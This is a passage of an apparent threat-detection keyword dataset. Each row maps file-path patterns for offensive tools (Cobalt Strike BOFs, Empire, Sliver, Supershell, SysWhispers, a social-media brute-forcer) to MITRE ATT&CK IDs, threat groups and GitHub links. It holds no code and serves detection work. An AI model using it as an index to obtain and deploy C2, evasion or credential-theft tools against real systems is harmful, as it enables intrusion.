T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1066,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/stagers/CSharpPS*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/start_campaign.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*/StaticSyscallsAPCSpawn/*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/StaticSyscallsInject/*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/StayKit.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,1,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*/Staykit/StayKit.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,1,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*/stinger_client.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/striker.c,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*/Striker.git*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*/striker.local*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*/striker.py,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*/string_of_paerls.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/stun-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/stun-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/stuxnet-detect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/subdomain.yaml*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,1,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*/subdomains.txt*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*/subdomains-10000.txt*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*/Suborner.git*,offensive_tool_keyword,Suborner,The Invisible Account Forger - A simple program to create a Windows account you will only know about ,T1098 - T1175 - T1033,TA0007 - TA0008 - TA0003,N/A,N/A,Persistence,https://github.com/r4wd3r/Suborner,1,1,N/A,N/A,5,452,58,2022-09-02T09:04:46Z,2022-04-26T00:12:58Z -*/sudo_tracer.c*,offensive_tool_keyword,3snake,Tool for extracting information from newly spawned processes,T1003 - T1110 - T1552 - T1505,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/blendin/3snake,1,0,N/A,7,7,688,113,2022-02-14T17:42:10Z,2018-02-07T21:03:15Z -*/sudomy.api*,offensive_tool_keyword,Sudomy,Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting,T1595 - T1046,TA0002,N/A,N/A,Reconnaissance,https://github.com/screetsec/Sudomy,1,1,N/A,N/A,10,1718,352,2023-09-19T08:38:55Z,2019-07-26T10:26:34Z -*/sullo/nikto*,offensive_tool_keyword,nikto,Nikto web scanner tool,T1210.001 - T1190 - T1046 - T1222,TA0007 - TA0002 - TA0001,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -*/sunlogin_rce*,offensive_tool_keyword,POC,SunloginClient RCE vulnerable version,T1587,TA0001 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/sunlogin_rce,1,1,N/A,N/A,5,462,201,2022-02-16T16:11:42Z,2022-02-16T14:20:41Z -*/Sup3r-Us3r/scripts/*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*/supermicro-ipmi-conf.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Supernova.exe*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,1,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*/Supernova.git*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,1,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*/SuperProfileDLL*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/Supershell.tar.gz*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*/supershell/login/auth*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*/Supershell/releases*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*/suspendresume.x64*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/suspendresume.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/svn-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/SweetPotato_CS*,offensive_tool_keyword,cobaltstrike,Modified SweetPotato to work with CobaltStrike v4.0,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tycx2ry/SweetPotato_CS,1,1,N/A,10,10,236,49,2020-04-30T14:27:20Z,2020-04-16T08:01:31Z -*/Synergy-httpx.git*,offensive_tool_keyword,Synergy-httpx,A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically,T1021.002 - T1105 - T1090,TA0002 - TA0011 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/t3l3machus/Synergy-httpx,1,1,N/A,8,2,108,14,2023-09-09T10:38:38Z,2023-06-02T10:06:41Z -*/syscalls/syscalls_windows.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/syscalls/syswhispers/*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*/syscalls/syswhispersv2*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*/SyscallsInject/*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/SysmonQuiet*,offensive_tool_keyword,sysmonquiet,RDLL for Cobalt Strike beacon to silence Sysmon process,T1055 - T1055.012 - T1063,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ScriptIdiot/SysmonQuiet,1,1,N/A,N/A,1,81,15,2022-09-09T12:28:15Z,2022-07-11T14:17:34Z -*/SysWhispers2*,offensive_tool_keyword,SysWhispers3,SysWhispers on Steroids - AV/EDR evasion via direct system calls.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/klezVirus/SysWhispers3,1,1,N/A,N/A,10,1006,148,2023-03-22T19:23:21Z,2022-03-07T18:56:21Z -*/SysWhispers3*,offensive_tool_keyword,SysWhispers3,SysWhispers on Steroids - AV/EDR evasion via direct system calls.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/klezVirus/SysWhispers3,1,1,N/A,N/A,10,1006,148,2023-03-22T19:23:21Z,2022-03-07T18:56:21Z -*/SysWhispers3.git*,offensive_tool_keyword,SysWhispers3,SysWhispers on Steroids - AV/EDR evasion via direct system calls.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/klezVirus/SysWhispers3,1,1,N/A,N/A,10,1006,148,2023-03-22T19:23:21Z,2022-03-07T18:56:21Z -*/syswhispersv2*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*/t3l3machus/Villain*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality 